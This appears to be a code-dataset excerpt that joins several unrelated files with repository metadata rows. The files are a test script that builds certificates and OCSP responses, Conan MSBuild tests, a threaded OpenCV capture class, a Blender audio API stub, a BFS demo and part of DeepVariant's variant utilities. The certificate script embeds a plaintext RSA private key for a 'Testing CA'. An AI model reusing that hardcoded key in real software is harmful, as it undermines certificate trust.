kbIiYfQ0G7Jl5yIc8AVw+hgE8hntBVuacrkPRmaviwwkms7IjsvpKsI3AkEAgjhs
5ZIX3RXHHVtO3EvVP86+mmdAEO+TzdHOVlMZ+1ohsOx8t5I+8QEnszNaZbvw6Lua
W/UjgkXmgR1UFTJMnwJBAKErmAw21/g3SST0a4wlyaGT/MbXL8Ouwnb5IOKQVe55
CZdeVeSh6cJ4hAcQKfr2s1JaZTJFIBPGKAif5HqpydA=
-----END RSA PRIVATE KEY-----
'''
# Root certificate CN
ISSUER_CN = "Testing CA"
# All certificates are issued under this policy OID, in the Google arc:
CERT_POLICY_OID = asn1.OID([1, 3, 6, 1, 4, 1, 11129, 2, 4, 1])
# These result in the following root certificate:
# -----BEGIN CERTIFICATE-----
# MIIB0TCCATqgAwIBAgIBATANBgkqhkiG9w0BAQUFADAVMRMwEQYDVQQDEwpUZXN0aW5nIENBMB4X
# DTEwMDEwMTA2MDAwMFoXDTMyMTIwMTA2MDAwMFowFTETMBEGA1UEAxMKVGVzdGluZyBDQTCBnTAN
# BgkqhkiG9w0BAQEFAAOBiwAwgYcCgYEApxmY8pML/nPQMah/Ez0vN47u7tUqd+RND8n/bwf/Msvz
# 2pmd5O1lgyr8sIB/mHh1BlOdJYoM48LHeWdlMJmpA0qbEVqHbDmoxOTtSs0MZAlZRvs57utHoHBN
# uwGKz0jDocS4lfxAn7SjQKmGsa/EVRmrnspHwwGFx3HGSqXs8H0CAQOjMzAxMBIGA1UdEwEB/wQI
# MAYBAf8CAQAwGwYDVR0gAQEABBEwDzANBgsrBgEEAdZ5AgHODzANBgkqhkiG9w0BAQUFAAOBgQA/
# STb40A6D+93jMfLGQzXc997IsaJZdoPt7tYa8PqGJBL62EiTj+erd/H5pDZx/2/bcpOG4m9J56yg
# wOohbllw2TM+oeEd8syzV6X+1SIPnGI56JRrm3UXcHYx1Rq5loM9WKAiz/WmIWmskljsEQ7+542p
# q0pkHjs8nuXovSkUYA==
# -----END CERTIFICATE-----
# If you update any of the above, you can generate a new root with the
# following line:
# print DERToPEM(MakeCertificate(ISSUER_CN, ISSUER_CN, 1, KEY, KEY, None))
# Various OIDs
AIA_OCSP = asn1.OID([1, 3, 6, 1, 5, 5, 7, 48, 1])
AUTHORITY_INFORMATION_ACCESS = asn1.OID([1, 3, 6, 1, 5, 5, 7, 1, 1])
BASIC_CONSTRAINTS = asn1.OID([2, 5, 29, 19])
CERT_POLICIES = asn1.OID([2, 5, 29, 32])
COMMON_NAME = asn1.OID([2, 5, 4, 3])
COUNTRY = asn1.OID([2, 5, 4, 6])
HASH_SHA1 = asn1.OID([1, 3, 14, 3, 2, 26])
OCSP_TYPE_BASIC = asn1.OID([1, 3, 6, 1, 5, 5, 7, 48, 1, 1])
ORGANIZATION = asn1.OID([2, 5, 4, 10])
PUBLIC_KEY_RSA = asn1.OID([1, 2, 840, 113549, 1, 1, 1])
SHA256_WITH_RSA_ENCRYPTION = asn1.OID([1, 2, 840, 113549, 1, 1, 11])
def MakeCertificate(
issuer_cn, subject_cn, serial, pubkey, privkey, ocsp_url = None):
'''MakeCertificate returns a DER encoded certificate, signed by privkey.'''
extensions = asn1.SEQUENCE([])
# Default subject name fields
c = "XX"
o = "Testing Org"
if issuer_cn == subject_cn:
# Root certificate.
c = None
o = None
extensions.children.append(
asn1.SEQUENCE([
basic_constraints,
True,
asn1.OCTETSTRING(asn1.ToDER(asn1.SEQUENCE([
True, # IsCA
0, # Path len
]))),
]))
if ocsp_url is not None:
extensions.children.append(
asn1.SEQUENCE([
AUTHORITY_INFORMATION_ACCESS,
False,
asn1.OCTETSTRING(asn1.ToDER(asn1.SEQUENCE([
asn1.SEQUENCE([
AIA_OCSP,
asn1.Raw(asn1.TagAndLength(0x86, len(ocsp_url)) + ocsp_url),
]),
]))),
]))
extensions.children.append(
asn1.SEQUENCE([
CERT_POLICIES,
False,
asn1.OCTETSTRING(asn1.ToDER(asn1.SEQUENCE([
asn1.SEQUENCE([ # PolicyInformation
CERT_POLICY_OID,
]),
]))),
])
)
tbsCert = asn1.ToDER(asn1.SEQUENCE([
asn1.Explicit(0, 2), # Version
serial,
asn1.SEQUENCE([SHA256_WITH_RSA_ENCRYPTION, None]), # SignatureAlgorithm
Name(cn = issuer_cn), # Issuer
asn1.SEQUENCE([ # Validity
asn1.UTCTime("100101060000Z"), # NotBefore
asn1.UTCTime("321201060000Z"), # NotAfter
]),
Name(cn = subject_cn, c = c, o = o), # Subject
asn1.SEQUENCE([ # SubjectPublicKeyInfo
asn1.SEQUENCE([ # Algorithm
PUBLIC_KEY_RSA,
None,
]),
asn1.BitString(asn1.ToDER(pubkey)),
]),
asn1.Explicit(3, extensions),
]))
return asn1.ToDER(asn1.SEQUENCE([
asn1.Raw(tbsCert),
asn1.SEQUENCE([
SHA256_WITH_RSA_ENCRYPTION,
None,
]),
asn1.BitString(privkey.Sign(tbsCert)),
]))
def MakeOCSPResponse(issuer_cn, issuer_key, serial, ocsp_state):
# https://tools.ietf.org/html/rfc2560
issuer_name_hash = asn1.OCTETSTRING(
hashlib.sha1(asn1.ToDER(Name(cn = issuer_cn))).digest())
issuer_key_hash = asn1.OCTETSTRING(
hashlib.sha1(asn1.ToDER(issuer_key)).digest())
cert_status = None
if ocsp_state == OCSP_STATE_REVOKED:
cert_status = asn1.Explicit(1, asn1.GeneralizedTime("20100101060000Z"))
elif ocsp_state == OCSP_STATE_UNKNOWN:
cert_status = asn1.Raw(asn1.TagAndLength(0x80 | 2, 0))
elif ocsp_state == OCSP_STATE_GOOD:
cert_status = asn1.Raw(asn1.TagAndLength(0x80 | 0, 0))
else:
raise ValueError('Bad OCSP state: ' + str(ocsp_state))
basic_resp_data_der = asn1.ToDER(asn1.SEQUENCE([
asn1.Explicit(2, issuer_key_hash),
asn1.GeneralizedTime("20100101060000Z"), # producedAt
asn1.SEQUENCE([
asn1.SEQUENCE([ # SingleResponse
asn1.SEQUENCE([ # CertID
asn1.SEQUENCE([ # hashAlgorithm
HASH_SHA1,
None,
]),
issuer_name_hash,
issuer_key_hash,
serial,
]),
cert_status,
asn1.GeneralizedTime("20100101060000Z"), # thisUpdate
asn1.Explicit(0, asn1.GeneralizedTime("20300101060000Z")), # nextUpdate
]),
]),
]))
basic_resp = asn1.SEQUENCE([
asn1.Raw(basic_resp_data_der),
asn1.SEQUENCE([
SHA256_WITH_RSA_ENCRYPTION,
None,
]),
asn1.BitString(issuer_key.Sign(basic_resp_data_der)),
])
resp = asn1.SEQUENCE([
asn1.ENUMERATED(0),
asn1.Explicit(0, asn1.SEQUENCE([
OCSP_TYPE_BASIC,
asn1.OCTETSTRING(asn1.ToDER(basic_resp)),
]))
])
return asn1.ToDER(resp)
def DERToPEM(der):
pem = '-----BEGIN CERTIFICATE-----\n'
pem += der.encode('base64')
pem += '-----END CERTIFICATE-----\n'
return pem
OCSP_STATE_GOOD = 1
OCSP_STATE_REVOKED = 2
OCSP_STATE_INVALID = 3
OCSP_STATE_UNAUTHORIZED = 4
OCSP_STATE_UNKNOWN = 5
# unauthorizedDER is an OCSPResponse with a status of 6:
# SEQUENCE { ENUM(6) }
unauthorizedDER = '30030a0106'.decode('hex')
def GenerateCertKeyAndOCSP(subject = "127.0.0.1",
ocsp_url = "http://127.0.0.1",
ocsp_state = OCSP_STATE_GOOD,
serial = 0):
'''GenerateCertKeyAndOCSP returns a (cert_and_key_pem, ocsp_der) where:
* cert_and_key_pem contains a certificate and private key in PEM format
with the given subject common name and OCSP URL.
* ocsp_der contains a DER encoded OCSP response or None if ocsp_url is
None'''
if serial == 0:
serial = RandomNumber(16)
cert_der = MakeCertificate(ISSUER_CN, bytes(subject), serial, KEY, KEY,
bytes(ocsp_url))
cert_pem = DERToPEM(cert_der)
ocsp_der = None
if ocsp_url is not None:
if ocsp_state == OCSP_STATE_UNAUTHORIZED:
ocsp_der = unauthorizedDER
elif ocsp_state == OCSP_STATE_INVALID:
ocsp_der = '3'
else:
ocsp_der = MakeOCSPResponse(ISSUER_CN, KEY, serial, ocsp_state)
return (cert_pem + KEY_PEM, ocsp_der)
| 29.962857 | 271 | 0.678173 |
acf690651c3a8a8910c39109fe654b856288443f | 2,747 | py | Python | conans/test/unittests/tools/microsoft/test_msbuild.py | JoachimKuebart-TomTom/conan | bf716c094d6b3f5acd727eed3c4b4fe1ad9e1c00 | [
"MIT"
] | null | null | null | conans/test/unittests/tools/microsoft/test_msbuild.py | JoachimKuebart-TomTom/conan | bf716c094d6b3f5acd727eed3c4b4fe1ad9e1c00 | [
"MIT"
] | null | null | null | conans/test/unittests/tools/microsoft/test_msbuild.py | JoachimKuebart-TomTom/conan | bf716c094d6b3f5acd727eed3c4b4fe1ad9e1c00 | [
"MIT"
] | null | null | null | import mock
import os
import textwrap
from mock import Mock
from conan.tools.microsoft import MSBuild, MSBuildToolchain
from conans.model.conf import ConfDefinition
from conans.model.env_info import EnvValues
from conans.test.utils.mocks import ConanFileMock, MockSettings
from conans.tools import load
from conans import ConanFile, Settings
def test_msbuild_cpu_count():
c = ConfDefinition()
c.loads(textwrap.dedent("""\
tools.microsoft.msbuild:max_cpu_count=23
tools.build:processes=10
"""))
settings = MockSettings({"build_type": "Release",
"compiler": "gcc",
"compiler.version": "7",
"os": "Linux",
"arch": "x86_64"})
conanfile = ConanFileMock()
conanfile.settings = settings
conanfile.conf = c.get_conanfile_conf(None)
msbuild = MSBuild(conanfile)
cmd = msbuild.command('project.sln')
assert '/m:23' in cmd
def test_msbuild_toolset():
settings = Settings({"build_type": ["Release"],
"compiler": {"msvc": {"version": ["19.3"]}},
"os": ["Windows"],
"arch": ["x86_64"]})
conanfile = ConanFile(Mock(), None)
conanfile.settings = "os", "compiler", "build_type", "arch"
conanfile.initialize(settings, EnvValues())
conanfile.settings.build_type = "Release"
conanfile.settings.compiler = "msvc"
conanfile.settings.compiler.version = "19.3"
conanfile.settings.os = "Windows"
conanfile.settings.arch = "x86_64"
msbuild = MSBuildToolchain(conanfile)
assert 'v143' in msbuild.toolset
def test_msbuild_standard():
settings = Settings({"build_type": ["Release"],
"compiler": {"msvc": {"version": ["19.3"], "cppstd": ["20"]}},
"os": ["Windows"],
"arch": ["x86_64"]})
conanfile = ConanFile(Mock(), None)
conanfile.folders.set_base_generators(".")
conanfile.install_folder = os.getcwd()
conanfile.conf = ConfDefinition()
conanfile.settings = "os", "compiler", "build_type", "arch"
conanfile.initialize(settings, EnvValues())
conanfile.settings.build_type = "Release"
conanfile.settings.compiler = "msvc"
conanfile.settings.compiler.version = "19.3"
conanfile.settings.compiler.cppstd = "20"
conanfile.settings.os = "Windows"
conanfile.settings.arch = "x86_64"
msbuild = MSBuildToolchain(conanfile)
with mock.patch("conan.tools.microsoft.visual.vcvars_path", mock.MagicMock(return_value=".")):
msbuild.generate()
assert '<LanguageStandard>stdcpp20</LanguageStandard>' in load('conantoolchain_release_x64.props')
| 37.121622 | 102 | 0.631962 |
acf691583ff7d733f141d9366740fb6cfb40ed2c | 1,486 | py | Python | video_capture.py | desmondcheongzx/AR-window-hardware | 34b19c5c09a3ab3ce43a19c62e978f38c1ba635d | [
"MIT"
] | null | null | null | video_capture.py | desmondcheongzx/AR-window-hardware | 34b19c5c09a3ab3ce43a19c62e978f38c1ba635d | [
"MIT"
] | null | null | null | video_capture.py | desmondcheongzx/AR-window-hardware | 34b19c5c09a3ab3ce43a19c62e978f38c1ba635d | [
"MIT"
] | null | null | null | import cv2
import threading
class VideoCaptureAsync:
def __init__(self, src=0, width=480, height=360, driver=None):
self.src = src
if not driver:
self.cap = cv2.VideoCapture(self.src)
else:
self.cap = cv2.VideoCapture(self.src, driver)
self.cap.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
self.grabbed, self.frame = self.cap.read()
self.started = False
self.read_lock = threading.Lock()
self.thread = None
def get(self, var1):
return self.cap.get(var1)
def set(self, var1, var2):
self.cap.set(var1, var2)
def start(self):
if self.started:
print('Asynchroneous video capturing has already been started.')
return None
self.started = True
self.thread = threading.Thread(target=self.update, args=())
self.thread.start()
return self
def update(self):
while self.started:
grabbed, frame = self.cap.read()
with self.read_lock:
self.grabbed = grabbed
self.frame = frame
def read(self):
with self.read_lock:
frame = self.frame.copy()
grabbed = self.grabbed
return grabbed, frame
def stop(self):
self.started = False
self.thread.join()
def __exit__(self, exec_type, exec_value, traceback):
self.cap.release()
| 27.518519 | 76 | 0.585464 |
acf6917f0de09e129bf3ac819d14f20cdb33fae6 | 258 | py | Python | chapter_02_data_structures/section_2_2_collections/2_21_collections_counter_most_common.py | wuxiaofeng8764/P3SL_Example | 8ce1877af7372211b20836f799a8c44679577b7c | [
"MIT"
] | null | null | null | chapter_02_data_structures/section_2_2_collections/2_21_collections_counter_most_common.py | wuxiaofeng8764/P3SL_Example | 8ce1877af7372211b20836f799a8c44679577b7c | [
"MIT"
] | null | null | null | chapter_02_data_structures/section_2_2_collections/2_21_collections_counter_most_common.py | wuxiaofeng8764/P3SL_Example | 8ce1877af7372211b20836f799a8c44679577b7c | [
"MIT"
] | null | null | null | import collections
c = collections.Counter()
with open('/usr/share/dict/words', 'rt') as f:
for line in f:
c.update(line.rstrip().lower())
print('Most common:')
for letter, count in c.most_common(3):
print('{}: {:>7}'.format(letter, count)) | 25.8 | 46 | 0.639535 |
acf691acbbc26ec2c22eb0d63a312f7950f1e6fa | 4,542 | py | Python | premade_modules/2.79/2.79b/aud.py | echantry/fake-bpy-module | 004cdf198841e639b7d9a4c4db95ca1c0d3aa2c7 | [
"MIT"
] | null | null | null | premade_modules/2.79/2.79b/aud.py | echantry/fake-bpy-module | 004cdf198841e639b7d9a4c4db95ca1c0d3aa2c7 | [
"MIT"
] | null | null | null | premade_modules/2.79/2.79b/aud.py | echantry/fake-bpy-module | 004cdf198841e639b7d9a4c4db95ca1c0d3aa2c7 | [
"MIT"
] | null | null | null | AUD_DEVICE_JACK = None
'''constant value 3 '''
AUD_DEVICE_NULL = None
'''constant value 0 '''
AUD_DEVICE_OPENAL = None
'''constant value 1 '''
AUD_DEVICE_SDL = None
'''constant value 2 '''
AUD_DISTANCE_MODEL_EXPONENT = None
'''constant value 5 '''
AUD_DISTANCE_MODEL_EXPONENT_CLAMPED = None
'''constant value 6 '''
AUD_DISTANCE_MODEL_INVALID = None
'''constant value 0 '''
AUD_DISTANCE_MODEL_INVERSE = None
'''constant value 1 '''
AUD_DISTANCE_MODEL_INVERSE_CLAMPED = None
'''constant value 2 '''
AUD_DISTANCE_MODEL_LINEAR = None
'''constant value 3 '''
AUD_DISTANCE_MODEL_LINEAR_CLAMPED = None
'''constant value 4 '''
AUD_FORMAT_FLOAT32 = None
'''constant value 36 '''
AUD_FORMAT_FLOAT64 = None
'''constant value 40 '''
AUD_FORMAT_INVALID = None
'''constant value 0 '''
AUD_FORMAT_S16 = None
'''constant value 18 '''
AUD_FORMAT_S24 = None
'''constant value 19 '''
AUD_FORMAT_S32 = None
'''constant value 20 '''
AUD_FORMAT_U8 = None
'''constant value 1 '''
AUD_STATUS_INVALID = None
'''constant value 0 '''
AUD_STATUS_PAUSED = None
'''constant value 2 '''
AUD_STATUS_PLAYING = None
'''constant value 1 '''
AUD_STATUS_STOPPED = None
'''constant value 3 '''
class Device:
'''Unlocks the device after a lock call, see lock() for details. '''
channels = None
'''The channel count of the device. '''
distance_model = None
'''The distance model of the device. '''
doppler_factor = None
'''The doppler factor of the device. This factor is a scaling factor for the velocity vectors in doppler calculation. So a value bigger than 1 will exaggerate the effect as it raises the velocity. '''
format = None
'''The native sample format of the device. '''
listener_location = None
'''The listeners’s location in 3D space, a 3D tuple of floats. '''
listener_orientation = None
'''The listener’s orientation in 3D space as quaternion, a 4 float tuple. '''
listener_velocity = None
'''The listener’s velocity in 3D space, a 3D tuple of floats. '''
rate = None
'''The sampling rate of the device in Hz. '''
speed_of_sound = None
'''The speed of sound of the device. The speed of sound in air is typically 343.3 m/s. '''
volume = None
'''The overall volume of the device. '''
class Factory:
'''Changes the volume of a factory. '''
pass
class Handle:
'''Stops playback. '''
attenuation = None
'''This factor is used for distance based attenuation of the source. '''
cone_angle_inner = None
'''The opening angle of the inner cone of the source. If the cone values of a source are set there are two (audible) cones with the apex at the location of the source and with infinite height, heading in the direction of the source’s orientation. In the inner cone the volume is normal. Outside the outer cone the volume will be cone_volume_outer and in the area between the volume will be interpolated linearly. '''
cone_angle_outer = None
'''The opening angle of the outer cone of the source. '''
cone_volume_outer = None
'''The volume outside the outer cone of the source. '''
distance_maximum = None
'''The maximum distance of the source. If the listener is further away the source volume will be 0. '''
distance_reference = None
'''The reference distance of the source. At this distance the volume will be exactly volume. '''
keep = None
'''Whether the sound should be kept paused in the device when its end is reached. This can be used to seek the sound to some position and start playback again. '''
location = None
'''The source’s location in 3D space, a 3D tuple of floats. '''
loop_count = None
'''The (remaining) loop count of the sound. A negative value indicates infinity. '''
orientation = None
'''The source’s orientation in 3D space as quaternion, a 4 float tuple. '''
pitch = None
'''The pitch of the sound. '''
position = None
'''The playback position of the sound in seconds. '''
relative = None
'''Whether the source’s location, velocity and orientation is relative or absolute to the listener. '''
status = None
'''Whether the sound is playing, paused or stopped (=invalid). '''
velocity = None
'''The source’s velocity in 3D space, a 3D tuple of floats. '''
volume = None
'''The volume of the sound. '''
volume_maximum = None
'''The maximum volume of the source. '''
volume_minimum = None
'''The minimum volume of the source. '''
class error:
pass
| 27.035714 | 420 | 0.686262 |
acf692cb8673c3544a764e1491e7a45163f831ef | 1,082 | py | Python | Python/Searches/Breadth First Search.py | CaptainSora/synaptic-twilight | 5f5f29f783e22fd91e9a0567eecc4461376d51bd | [
"MIT"
] | null | null | null | Python/Searches/Breadth First Search.py | CaptainSora/synaptic-twilight | 5f5f29f783e22fd91e9a0567eecc4461376d51bd | [
"MIT"
] | null | null | null | Python/Searches/Breadth First Search.py | CaptainSora/synaptic-twilight | 5f5f29f783e22fd91e9a0567eecc4461376d51bd | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Tue Feb 21 22:09:41 2017
@author: Joseph
"""
graph = {'A': set(['B', 'D']),
'B': set(['A', 'C', 'G']),
'C': set(['B', 'I', 'J']),
'D': set(['A', 'E', 'J']),
'E': set(['D', 'F']),
'F': set(['E', 'J', 'K']),
'G': set(['B']),
'H': set(['I', 'L']),
'I': set(['C', 'H']),
'J': set(['C', 'D', 'F']),
'K': set(['F', 'L']),
'L': set(['H', 'K'])}
def bfs(graph, start):
visited, queue = set(), [start]
while queue:
vertex = queue.pop(0)
if vertex not in visited:
visited.add(vertex)
queue.extend(graph[vertex] - visited)
print(visited)
bfs(graph, 'A')
def bfs_paths(graph, start, goal):
queue = [(start, [start])]
while queue:
(vertex, path) = queue.pop(0)
for next in graph[vertex] - set(path):
if next == goal:
yield path + [next]
else:
queue.append((next, path+[next]))
print(list(bfs_paths(graph, 'A', 'L')))
| 24.044444 | 49 | 0.414972 |
acf692d4d51e38c953826cad821035467d715ecb | 26,321 | py | Python | deepvariant/core/variantutils.py | rose-brain/deepvariant | 59687bab3a93ba0674cc21edf71caf336b01f138 | [
"BSD-3-Clause"
] | 1 | 2019-05-09T21:56:48.000Z | 2019-05-09T21:56:48.000Z | deepvariant/core/variantutils.py | rose-brain/deepvariant | 59687bab3a93ba0674cc21edf71caf336b01f138 | [
"BSD-3-Clause"
] | null | null | null | deepvariant/core/variantutils.py | rose-brain/deepvariant | 59687bab3a93ba0674cc21edf71caf336b01f138 | [
"BSD-3-Clause"
] | null | null | null | # Copyright 2017 Google Inc.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Variant utilities."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import enum
from deepvariant.core.genomics import struct_pb2
from deepvariant.core.genomics import variants_pb2
from deepvariant.core import ranges
# The alternate allele string for reference (no alt).
NO_ALT_ALLELE = '.'
# The alternate allele string for the gVCF "any" alternate allele.
GVCF_ALT_ALLELE = '<*>'
def set_variantcall_gq(variant_call, gq):
if 'GQ' in variant_call.info:
del variant_call.info['GQ']
variant_call.info['GQ'].values.extend([struct_pb2.Value(number_value=gq)])
def decode_variants(encoded_iter):
"""Yields a genomics.Variant from encoded_iter.
Args:
encoded_iter: An iterable that produces binary encoded
third_party.nucleus.protos.Variant strings.
Yields:
A parsed third_party.nucleus.protos.Variant for each
encoded element of encoded_iter
in order.
"""
for encoded in encoded_iter:
yield variants_pb2.Variant.FromString(encoded)
def variant_position(variant):
"""Returns a new Range at the start position of variant.
Args:
variant: third_party.nucleus.protos.Variant.
Returns:
A new Range with the same reference_name as variant and start but an end
that is start + 1. This produces a range that is the single basepair of the
start of variant, hence the name position.
"""
return ranges.make_range(variant.reference_name, variant.start,
variant.start + 1)
def variant_range(variant):
"""Returns a new Range covering variant.
Args:
variant: third_party.nucleus.protos.Variant.
Returns:
A new Range with the same reference_name, start, and end as variant.
"""
return ranges.make_range(variant.reference_name, variant.start, variant.end)
def variant_range_tuple(variant):
"""Returns a new tuple of (reference_name, start, end) for the variant.
A common use case for this function is to sort variants by chromosomal
location, with usage like `sorted(variants, key=variant_range_tuple)`.
Args:
variant: third_party.nucleus.protos.Variant.
Returns:
A three-tuple with the same reference_name, start, and end as variant.
"""
return (variant.reference_name, variant.start, variant.end)
@enum.unique
class GenotypeType(enum.Enum):
"""An enumeration of the types of genotypes."""
hom_ref = ('homozygous reference', [0, 0], 0)
het = ('heterozygous', [0, 1], 1)
hom_var = ('homozygous non-reference', [1, 1], 2)
no_call = ('no call', [-1, -1], -1)
def __init__(self, full_name, example_gt, class_id):
self.full_name = full_name
self.example_gt = example_gt
self.class_id = class_id
@enum.unique
class VariantType(enum.Enum):
"""An enumeration of the types of variants."""
# a variant.proto where there is no alt allele
ref = 0
# a non-reference variant.proto where all ref and alt alleles
# are single basepairs
snp = 1
# a non-reference variant.proto where at least one of ref or alt alleles
# are longer than 1 bp
indel = 2
def format_filters(variant):
"""Gets a human-readable string showing the filters applied to variant.
Returns a string with the filter field values of variant separated by commas.
If the filter field isn't set, returns '.'.
Args:
variant: third_party.nucleus.protos.Variant.
Returns:
A string.
"""
return ','.join(variant.filter) if variant.filter else '.'
def format_alleles(variant):
"""Gets a string representation of the variants alleles.
Args:
variant: third_party.nucleus.protos.Variant.
Returns:
A string ref_bases/alt1,alt2 etc.
"""
return '{}/{}'.format(variant.reference_bases, ','.join(
variant.alternate_bases))
def format_position(variant):
"""Gets a string representation of the variants position.
Args:
variant: third_party.nucleus.protos.Variant.
Returns:
A string chr:start + 1 (as start is zero-based).
"""
return '{}:{}'.format(variant.reference_name, variant.start + 1)
def is_snp(variant):
"""Is variant a SNP?
Args:
variant: third_party.nucleus.protos.Variant.
Returns:
True if all alleles of variant are 1 bp in length.
"""
return (not is_ref(variant) and len(variant.reference_bases) == 1 and
len(variant.alternate_bases) >= 1 and
all(len(x) == 1 for x in variant.alternate_bases))
def is_indel(variant):
"""Is variant an indel?
An indel event is simply one where the size of at least one of the alleles
is > 1.
Args:
variant: third_party.nucleus.protos.Variant.
Returns:
True if the alleles in variant indicate an insertion/deletion event
occurs at this site.
"""
# redacted
# redacted
return (not is_ref(variant) and
(len(variant.reference_bases) > 1 or
any(len(alt) > 1 for alt in variant.alternate_bases)))
def is_biallelic(variant):
"""Returns True if variant has exactly one alternate allele."""
return len(variant.alternate_bases) == 1
def is_multiallelic(variant):
"""Does variant have multiple alt alleles?
Args:
variant: third_party.nucleus.protos.Variant.
Returns:
True if variant has more than one alt allele.
"""
return len(variant.alternate_bases) > 1
def is_ref(variant):
"""Returns true if variant is a reference record.
Variant protos can encode sites that aren't actually mutations in the
sample. For example, the record ref='A', alt='.' indicates that there is
no mutation present (i.e., alt is the missing value).
Args:
variant: third_party.nucleus.protos.Variant.
Returns:
A boolean.
"""
alts = variant.alternate_bases
return not alts or (len(alts) == 1 and alts[0] == '.')
def variant_type(variant):
"""Gets the VariantType of variant.
Args:
variant: third_party.nucleus.protos.Variant.
Returns:
VariantType indicating the type of this variant.
"""
if is_ref(variant):
return VariantType.ref
elif is_snp(variant):
return VariantType.snp
else:
return VariantType.indel
def is_transition(allele1, allele2):
"""Is the pair of single bp alleles a transition?
Args:
allele1: A string of the first allele, must be 1 bp in length.
allele2: A string of the second allele, must be 1 bp in length.
Returns:
True if allele1/allele2 are a transition SNP.
Raises:
ValueError: if allele1 and allele2 are equal or aren't 1 bp in length.
"""
if allele1 == allele2:
raise ValueError('Alleles must be unique:', allele1, allele2)
if len(allele1) != 1:
raise ValueError('Alleles must be 1 bp in length.', allele1)
if len(allele2) != 1:
raise ValueError('Alleles must be 1 bp in length.', allele2)
alleles_set = {allele1, allele2}
return any(alleles_set == x for x in [{'A', 'G'}, {'C', 'T'}])
def is_insertion(ref, alt):
"""Is alt an insertion w.r.t. ref?
Args:
ref: A string of the reference allele.
alt: A string of the alternative allele.
Returns:
True if alt is an insertion w.r.t. ref.
"""
return len(ref) < len(alt)
def is_deletion(ref, alt):
"""Is alt a deletion w.r.t. ref?
Args:
ref: A string of the reference allele.
alt: A string of the alternative allele.
Returns:
True if alt is a deletion w.r.t. ref.
"""
return len(ref) > len(alt)
def has_insertion(variant):
"""Does variant have an insertion?
Args:
variant: third_party.nucleus.protos.Variant.
Returns:
True if the alleles in variant indicate an insertion event
occurs at this site.
"""
ref = variant.reference_bases
return (is_indel(variant) and
any(is_insertion(ref, alt) for alt in variant.alternate_bases))
def has_deletion(variant):
"""Does variant have a deletion?
Args:
variant: third_party.nucleus.protos.Variant.
Returns:
True if the alleles in variant indicate an deletion event
occurs at this site.
"""
ref = variant.reference_bases
return (is_indel(variant) and
any(is_deletion(ref, alt) for alt in variant.alternate_bases))
@enum.unique
class AlleleMismatchType(enum.Enum):
"""An enumeration of the types of allele mismatches we detect."""
# Duplicate alleles
duplicate_eval_alleles = 1
duplicate_true_alleles = 2
# Truth has an allele that doesn't match any allele in eval.
unmatched_true_alleles = 3
# Eval has an allele that doesn't match any allele in truth.
unmatched_eval_alleles = 4
def allele_mismatches(evalv, truev):
"""Determines the set of allele mismatch discordances between evalv and truev.
Compares the alleles present in evalv and truev to determine if there are any
disagreements between the set of called alleles in the two Variant protos. The
type of differences basically boil down to:
-- Are there duplicate alt alleles?
-- Can we find a matching allele in the truev for each allele in evalv, and
vice versa?
Two alleles A and B match when they would produce the same sequence of bases
in ref and alt haplotypes starting at the same position. So CA=>TA is the same
as C=>T (position is the same, replacing A by A is a noop) but AC=>AT isn't
the same as C=>T because the former event changes bases 1 bp further along in
the reference genome than the C=>T allele.
Args:
evalv: A third_party.nucleus.protos.Variant.
truev: A third_party.nucleus.protos.Variant.
Returns:
A set of AlleleMismatchType values.
"""
unmatched_eval_alleles = []
# Use set removes duplicate alleles in truth and eval variants.
allele_matches = {alt: [] for alt in set(truev.alternate_bases)}
for eval_alt in set(evalv.alternate_bases):
# Loop over each possible alt allele, adding eval_alt to each matching alt
# allele.
found_match = False
for true_alt in allele_matches:
if (simplify_alleles(evalv.reference_bases, eval_alt) == simplify_alleles(
truev.reference_bases, true_alt)):
# We are a match to true_alt, so record that fact in allele_matches
allele_matches[true_alt].append(eval_alt)
found_match = True
if not found_match:
# We never found a match for eval_alt.
unmatched_eval_alleles.append(eval_alt)
# At this point we've checked every alt against every eval allele, and are
# ready to summarize the differences using our AlleleMismatchType enum.
types = set()
if len(set(evalv.alternate_bases)) != len(evalv.alternate_bases):
types.add(AlleleMismatchType.duplicate_eval_alleles)
if len(set(truev.alternate_bases)) != len(truev.alternate_bases):
types.add(AlleleMismatchType.duplicate_true_alleles)
if unmatched_eval_alleles:
types.add(AlleleMismatchType.unmatched_eval_alleles)
if any(len(match) != 1 for match in allele_matches.itervalues()):
types.add(AlleleMismatchType.unmatched_true_alleles)
return types
def simplify_alleles(*alleles):
"""Simplifies alleles by stripping off common postfix bases.
For example, simplify("AC", "GC") would produce the tuple "A", "G" as the "C"
base is a common postfix of both alleles. But simplify("AC", "GT") would
produce "AC", "GT" as there is no common postfix.
Note this function will never simplify any allele down to the empty string. So
if alleles = ['CACA', 'CA'], the longest common postfix is 'CA' but we will
not produce ['CA', ''] as this is an invalid Variant allele encoding. Instead
we produce ['CAC', 'C'].
Args:
*alleles: A tuple of bases, each as a string, to simplify.
